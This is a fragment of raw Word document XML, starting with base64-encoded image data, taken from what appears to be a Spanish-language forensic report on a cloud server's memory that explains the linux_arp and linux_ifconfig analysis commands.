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&#10;6fM/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GZG+OBAwAA&#10;IwgAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAA8BheKl&#10;yAAApcgAABQAAAAAAAAAAAAAAAAA5wUAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgA&#10;AAAhAEp5gSXcAAAABQEAAA8AAAAAAAAAAAAAAAAAvs4AAGRycy9kb3ducmV2LnhtbFBLAQItABQA&#10;BgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAAMfPAABkcnMvX3JlbHMvZTJvRG9jLnht&#10;bC5yZWxzUEsFBgAAAAAGAAYAfAEAALrQAAAAAA==&#10;">
                <v:shape id="Imagen 62" o:spid="_x0000_s1160" type="#_x0000_t75" style="position:absolute;width:37378;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HALyAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9dS8Mw&#10;FH0X/A/hCr65ZENirMuGiBMFXzZ98PHa3LXdmpvaxLb6640gyHk6nC/Ocj35VgzUxyawhflMgSAu&#10;g2u4svD6srkwIGJCdtgGJgtfFGG9Oj1ZYuHCyFsadqkSuYRjgRbqlLpCyljW5DHOQkectX3oPaZM&#10;+0q6Hsdc7lu5UEpLjw3nhRo7uqupPO4+vYXL+41WD+ZpMIfvZzOWb1rq9w9rz8+m2xsQiab0b/5L&#10;PzoLZqF0xtU1/F7Kd0CufgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBWGHALyAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId196" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1161" type="#_x0000_t202" style="position:absolute;left:38382;top:1594;width:15609;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QUoyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC+ypXaj2LpsjKGgXoZ1l90ezVtTbV5Kkm712xtB8Ph+/99qM9lenMmHzrGC+3kGgrhx&#10;uuNWweHjefYAIkRkjb1jUvBNATbr66sVVtpd+J3OdWxFCuFQoQIT41BJGRpDFsPcDcSJOzlvMabT&#10;t1J7vKRw28s8ywppsePUYHCgnaHmqx6tgv3yuDd34+npbbtc+NfDuCs+21qp25tp+wgi0hT/xX/u&#10;F53ml1lZLPKyzOH3pwSAXP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFH0FKMkAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="7348BD08" w14:textId="48C6D346" w:rsidR="003511D1" w:rsidRPr="00CA10B6" w:rsidRDefault="003511D1" w:rsidP="003511D1">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>41</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="104" w:name="_Toc155782608"/>
                        <w:r w:rsidRPr="00CE0941">
                          <w:t>Comando linux_arp.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="104"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se observa que la VM ha enviado paquetes a las direcciones 172.31.32.1 y 172.31.33.128. Tenemos 0.0.0.0 por lo que hay conexión a una red externa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC38642" w14:textId="3E027B07" w:rsidR="00FF4835" w:rsidRPr="00FF4835" w:rsidRDefault="000C4414" w:rsidP="00FF4835">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:t>Linux_ifconfig.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB7DDC" w14:textId="7513BB53" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En este apartado lo que se va a realizar es ver </w:t>
      </w:r>
      <w:r w:rsidR="005A186E" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cuál</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la dirección IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del cloud server dentro de su red. Para ello usare el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="005A186E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Con este comando se </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>va a obtener cuatro datos. El primero de ello es la interfaz de conexión. El segundo es la dirección IP. El tercero es la dirección MAC</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MAC: Media Access Control, dirección única asignada a la interfaz de red de un dispositivo.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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. El cuarto consulta si ese interfaz está en modo promiscuo, es decir, comprobará si dentro de la red, puede ver todos los paquetes del dominio de difusión. El comando que utilizaremos en este caso es </w:t>
      </w:r>
